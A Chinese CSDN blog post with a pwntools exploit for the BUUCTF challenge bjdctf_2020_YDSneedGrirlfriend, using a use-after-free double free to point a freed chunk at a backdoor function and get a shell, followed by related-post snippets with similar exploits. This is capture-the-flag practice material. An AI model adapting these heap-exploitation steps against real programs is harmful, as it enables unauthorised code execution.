bjdctf_2020_YDSneedGrirlfriend

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量453 收藏
点赞数
分类专栏: PWN 文章标签: 安全 unix 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/124049943
版权

漏洞点:uaf

exp:

from pwn import *

p=remote('node4.buuoj.cn',25968)
# p=process('./friend')
elf=ELF('./friend')

def add(size,name):
    p.sendlineafter("Your choice :",'1')
    p.sendlineafter("Her name size is :",str(size))
    p.sendlineafter("Her name is :",name)


def delete(index):
    p.sendlineafter("Your choice :",'2')
    p.sendlineafter("Index :",str(index))

def show(index):
    p.sendlineafter("Your choice :",'3')
    p.sendlineafter("Index :",str(index))

def dbg():
    gdb.attach(p)
    pause()

buf = 0x6020A0
sh = 0x400b9c

add(0x20,'aaaa')#0
add(0x20,'aaaa')#1
delete(0)
delete(1)
delete(0)
add(0x10,p64(sh))#2
show(1)

p.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——bjdctf_2020_YDSneedGrirlfriend(UAF)
mcmuyanga的博客
03-19 633
bjdctf_2020_YDSneedGrirlfriend 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,常见的堆题的菜单 64位ida载入,首先是检索字符串发现了程序中的后门函数,backdoor=0x400b9c add_girlfriend() del_girlfriend() print_girlfriend() 常见的uaf漏洞的利用方法,不清楚的详细看ctfwiki show函数会调用chunk里的puts输出chunk里的name
bjdctf_2020_YDSneedGrirlfriend(uaf)
m0_51251108的博客
11-04 326
bjdctf_2020_YDSneedGrirlfriend: 先大致一看 逆向分析: 主界面: add函数: free函数: show函数: 有后门 利用思路: 申请size同为0x20大小的chunk, doublefree 申请个不同size的chunk,使从bin链中取出一个0x20 位置就置换了,我们就能控制前面图片中说的要改的那个指针的值了 我们add 0x20 size,把它改为后门地址 然后show就可以了 exp: from pwn import * #from LibcSe
BUUCTF (pwn) bjdctf_2020_YDSneedGrirlfriend(UAF)
半岛铁盒的博客
06-19 204
这道题知识点,题型与 actf_2019_babyheap这道题很相似,就不写那么详细了,又不了解的可以去看看 菜单 后门 EXP from pwn import * p=remote('node3.buuoj.cn',29716) #p=process('./bjdctf_2020_YDSneedGrirlfriend') elf=ELF('./bjdctf_2020_YDSneedGrirlfriend') def add(size,name): p.sendlineaft
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
【PWN · heap | UAF】[BJDCTF 2020]YDSneedGirlfriend
Mr_Fmnwon的博客
11-02 178
UAF-释放后重用,这一题和wiki上教学的那一题一样,是纯的裸UAF题目初步涉猎heap,对于典型的漏洞利用,多加记载。
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2
归子莫的博客
05-06 954
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]ydsneedgirlfriend2 下载...
buuoj BJDCTF 2nd ydsneedgirlfriend2
pondzhang的专栏
03-30 334
free代码,free以后未置空指针 unsigned __int64 dele() { …… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); …… } 可以再次利用 from pwn import * #sh = process('./ydsneedgirlfriend2') def ad...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2741
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
[BJDCTF2020]Mark loves cat
qq_52907838的博客
06-08 301
打开环境,经过一番查找没有发现,后来dirsearch扫描后发现.git泄露,用git_extract下载得到flag.php和index.php。
2021-10-11 Pwn练习记录
m0_56897090的博客
10-11 394
文章目录easy题目分析EXP重做note2分析EXP重做[ZJCTF_2019]Easyheap分析EXP重做actf_2019_babystack分析EXP重做gyctf_2020_borrowstack分析EXP重做ciscn_2019_en_3分析EXP重做bjdctf_2020_YDSneedGrirlfrien分析EXP重做gyctf_2020_some_thing_interesting分析EXP重做ACTF_2019_babyheap分析EXP重做Wustctf2020_easyfast分析
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 485
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 452
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 225
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
访问网站显示不安全怎么办?
joySSL_的博客
08-02 460
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值